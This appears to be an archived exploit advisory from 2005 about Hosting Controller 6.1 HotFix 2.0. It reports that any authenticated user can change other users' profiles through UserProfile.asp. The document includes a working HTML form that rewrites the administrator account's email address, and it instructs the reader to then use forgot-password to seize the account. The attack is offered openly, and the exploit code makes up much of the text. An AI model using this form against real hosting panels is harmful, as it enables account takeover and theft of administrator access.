37 lines
No EOL
1.1 KiB
Text
37 lines
No EOL
1.1 KiB
Text
<!--
|
|
|
|
Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).
|
|
|
|
Title: Hosting controller program have a security bug
|
|
in "UserProfile.asp" that an authenticated user can
|
|
change other's profiles.
|
|
Why is it dangerous: a user can change other's email
|
|
address and then use forgot password to recieve their
|
|
password! also he/she can gain administrator password
|
|
by this way!
|
|
Version: 6.1 HotFix 2.0 and older
|
|
Developer url: hostingcontroller.com
|
|
Comment: Hosting Controller is an application to
|
|
manage a host.
|
|
|
|
Exploit code to proof:
|
|
--------------------------------
|
|
Change users profiles: -->
|
|
|
|
|
|
|
|
<form action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile" method="post">
|
|
Username : <input name="UserList" value="hcadmin" type="text" size="50">
|
|
<br>
|
|
emailaddress : <input name="emailaddress" value="Crkchat@msn.com" type="text" size="50">
|
|
<br>
|
|
firstname : <input name="firstname" value="Crkchat" type="text" size="50">
|
|
<br>
|
|
<input name="submit" value="submit" type="submit">
|
|
</form>
|
|
|
|
<!--
|
|
-----------------------------------
|
|
Now u can use forgot password to gain passwords! -->
|
|
|
|
# milw0rm.com [2005-05-27] |